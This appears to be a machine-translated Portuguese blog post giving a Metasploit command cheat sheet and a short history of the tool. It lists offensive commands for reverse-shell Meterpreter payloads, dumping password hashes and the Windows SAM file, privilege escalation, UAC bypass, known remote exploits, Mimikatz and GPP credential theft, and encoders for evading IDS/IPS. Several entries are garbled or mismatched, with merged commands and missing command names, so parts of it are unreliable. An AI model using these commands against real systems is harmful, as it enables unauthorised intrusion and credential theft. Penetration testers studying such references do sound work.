Deseja usar o Metasploit Pro Framework ou o Metasploit Unleashed ? Bem, você precisará saber seus comandos primeiro !. Abaixo, estamos compartilhando com você a última Lista de comandos Metasploit de 2021 . Esta folha de dicas contém todos os comandos de que você precisará, desde o básico para avançar!
Neste guia, falaremos sobre os fundamentos da folha de dicas dos comandos Metasploit que pode ser usado na interface da linha de comando. Existem também muitos outros consoles de linha de comando disponíveis na Internet (como MSFConsole Command Line ), mas eles são realmente difíceis de usar e entender.
Metasploit é um produto que pode ser usado para invadir um sistema remoto e também para testar a vulnerabilidade de um sistema de computador. Como todas as outras ferramentas de segurança da informação, o Metasploit também pode ser usado para ambos os fins (atividades não autorizadas e legítimas). O Rapid7 também adicionou as duas edições ou versões proprietárias chamadas Metasploit Pro e Metasploit Express. Você também pode ver alguns de nossos comandos do Terminal Kali Linux para hackear.
O Metasploit destaca o risco e a correção de bugs específicos que podem estar disponíveis em seu computador pessoal (PC). Posteriormente, a ferramenta fuzzing também foi incluída no Metasploit 3.0 que servia para descobrir as vulnerabilidades do software mesmo com exploits para os bugs conhecidos. Depois de algum tempo, o conjunto de ferramentas lorcon wireless (802.11) também foi adicionado ao Metasploit 3.0 no mês de novembro de 2006. Depois de todas essas atualizações o Rapid7 lançou o Metasploit 4.0 no mês de agosto de 2011.
Você pode obtenha o Metasploit Pro Framework na página abaixo:
Baixe o Metasploit Pro Framework gratuitamente
H. D. Moore foi o criador desta ferramenta de rede portátil chamada Metasploit usando Perl em 2003. Em 2007, o Framework Metasploit foi totalmente reescrito no Ruby. Em 21 de outubro st de 2009, o Metasploit anunciou que havia sido comprado ou adquirido pela Rapid7. Rapid7 é uma empresa de segurança que fornece muitos tipos de soluções unificadas de gerenciamento de vulnerabilidades.
Comando | Descrição do CMD |
definir carga útil windows/meterpreter/reverse_tcp | carga útil tcp reversa do Windows |
Comando | Descrição do CMD |
set payload windows/vncinject/reverse_tcpset ViewOnly false | Meterpreter Windows VNC Payload
|
Comando | Descrição do CMD |
set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Comando | Descrição do CMD |
upload de arquivo c:\\\\windows | Meterpreter carrega arquivo para o Windows target máquina |
download c:\\\\windows\\\\repair\\\\sam/tmp | Baixar arquivo do medidor do Windows target |
download c:\\\\windows\\\\repair\\\\sam/tmp | Meterpreter baixa os arquivos da máquina de destino do Windows |
execute-f c:\\\\windows\\temp\\exploit.exe | Meterpreter executa .exe no destino ? útil para executar exploits carregados |
execute-f cmd-c | Cria um novo canal usando o shell cmd |
ps | Meterpreter mostra os processos atuais que são executando |
shell | Meterpreter obtém o acesso shell na máquina ou servidor de destino |
getsystem | Meterpreter tenta escalar privilégios para obter acesso ao destino |
hashdump | Meterpreter tenta despejar os hashes no destino |
portfwd add-l 3389 –p 3389 –r target | Meterpreter cria uma porta de encaminhamento para a máquina de destino |
porta fwd delete –l 3389 –p 3389 –r target | Meterpreter exclui a função de encaminhamento de porta |
Leia: 9 principais comandos de hacking do prompt de comando do Microsoft CMD 2021.
Comando | Descrição do CMD |
use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
use exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 e Server 2008 (x86) Remote Exploit |
Comando | Descrição do CMD |
use exploit/windows/local/bypassuac | Ignorar UAC no Windows 7 + Definir destino + arco, x86/64 |
Comando | Descrição do CMD |
use auxiliary/scanner/http/dir_scanner | Metasploit scanner de diretório HTTP |
use auxiliary/scanner/http/jboss_vulnscan | Metasploit scanner de vulnerabilidade JBOSS |
use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
use auxiliary/scanner/mysql/mysql_version | Metasploit MSSQL Version Scanner |
use auxiliary/scanner/oracle/oracle_login | Módulo de Login Oracle Metasploit |
Leia também: O guia perfeito para DDoS como um hacker profissional.
Módulos Metasploit Powershell
Comando | Descrição do CMD |
use exploit/multi/script/web_delivery | Módulo de entrega de carga útil Metasploit powershell |
post/windows/manage/powershell/exec_powershell | Metasploit carrega e executa o script powershell por meio de uma sessão |
use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Comando | Descrição do CMD |
run post/windows/gather/win_privs | Metasploit mostra privilégios do usuário atual |
use post/windows/gather/credentials/gpp | Metasploit pegar senhas salvas do GPP |
oad mimikatz-> wdigest | Metasplit load Mimikatz |
run post/windows/gather/local_admin_search_enum | Identifique outras máquinas às quais o usuário de domínio fornecido tenha acesso administrativo |
Fonte: TheHackToday</Budap
Os Comando Metasploit para atualizar o Framework:
apt update; apt install metasploit-framework |
O seguinte comando mencionado acima fornece a versão mais recente do Framework Metasploit que é atualizado. A atualização diz o seguinte que devemos atualizar a atualização semanal da cópia de nosso Metasploit Framework. Mas há uma ligeira desvantagem deste comando e é que sua execução pode corromper ou quebrar a cópia do software que está instalado no PC.
Leitura recomendada : Top 8 Melhores Distribuições Linux para Hacking e Teste de Penetração!
Comandos do Metasploit msfhelp/console:
Quando você executa o Metasploit pela primeira vez, a janela a seguir abre na tela. Se você não sabe nada ou não tem nenhuma informação relacionada ao Metasploit, então você pode simplesmente digitar: help para ver todos os comandos e informações relacionadas ao Metasploit.
Não vou perder seu tempo explicando todos os comandos no Metasploit, mas discutirei alguns dos comandos básicos e mais usados que você usará principalmente.
Este comando é usado para pesquisar diferentes tipos ou tipos de vulnerabilidades e explorações do msfconsole.
Este comando é usado para ficar de olho na documentação e dar uma olhada no proprietário do exploit.
Leia: 8 melhores maneiras de proteger seu servidor Linux (Linux Hardening Guide 2021).
Com a ajuda deste comando simples, podemos usar os comandos show para exibir todos os valores exigidos pela carga útil, que podem ser usados para atacar o PC ou máquina vítima que queremos atacar.
Com a ajuda deste comando, você pode executar facilmente orm ao atacar a rede WAN, você só precisa definir o LHOST para o endereço IP estático IP e todas as outras portas de encaminhamento.
Se você está tentando na rede LAN, você não precisa executar o encaminhamento de porta, mas pode usar qualquer porta que desejar. Mas se você está atacando a rede WAN, você deve encaminhar a porta que deseja atacar, respectivamente.
Com a ajuda desse comando, usamos o comando show payloads. Este comando retornará uma lista completa de cargas úteis compatíveis para o exploit seguinte. Na figura a seguir, o Metasploit carregou muitos payloads compatíveis:
Este comando retornará uma lista inteira de sistemas operacionais que são muito vulneráveis à exploração selecionada ou escolhida. Depois de executar este comando, obtemos a seguinte saída do seguinte exploit:
adobe_flash_shader_drawing_fill exploit.
Usando este comando show advanced, podemos ver todas as opções avançadas para os exploits necessários.
Download: Software Nessus Professional Vulnerability Scanner.
Este comando é usado para retornar todos os codificadores compatíveis. Esses codificadores são usados para evitar as assinaturas IDS/IPS simples que foram procuradas para determinados bytes da carga disponível.
Este comando retornará uma lista completa dos geradores NOP. NOP é a abreviatura de No Operation e é usado para alterar o padrão para contornar IDS/IPS simples de trenós NOP comuns. Esses geradores NOP começam com uma configuração completa de arquitetura de CPU em seu nome.
Download: Acunetix Web Vulnerability Scanner Free.
Você pode visitar o Offensive Security site para todos os comandos AZ Metasploit.
Neste artigo, discutimos a Lista de comandos Metasploit em 2021 , também falamos sobre muitos comandos diferentes que você pode usar para realizar várias tarefas e todas as diferentes funcionalidades. É um método totalmente seguro para usar e executar a verificação de vulnerabilidade e para resolver todos os problemas relacionados.
Espero que este guia seja realmente útil para você. Compartilhe com seus amigos e familiares para ajudá-los a resolver seus problemas. Se você tiver alguma dúvida, deixe-a na seção de comentários. Estamos sempre aqui para ajudá-lo se precisar de alguma ajuda.
O Windows Mobility Center ou WMC é um componente integrado do Windows que centraliza as…
Aplicativo Xbox não abre no Windows 11?Os jogadores usam amplamente o aplicativo Xbox, pois permite…
O Microsoft Word tem um recurso de salvamento automático para tirar um instantâneo do seu…
Você está enfrentando problemas de distorção de áudio durante a transmissão no Windows 11?Clareza de…
Ao tentar visitar qualquer site no navegador, os usuários relataram enfrentar o código de erro…
O mouse ou trackpad está deixando de responder depois que seu PC com Windows sai…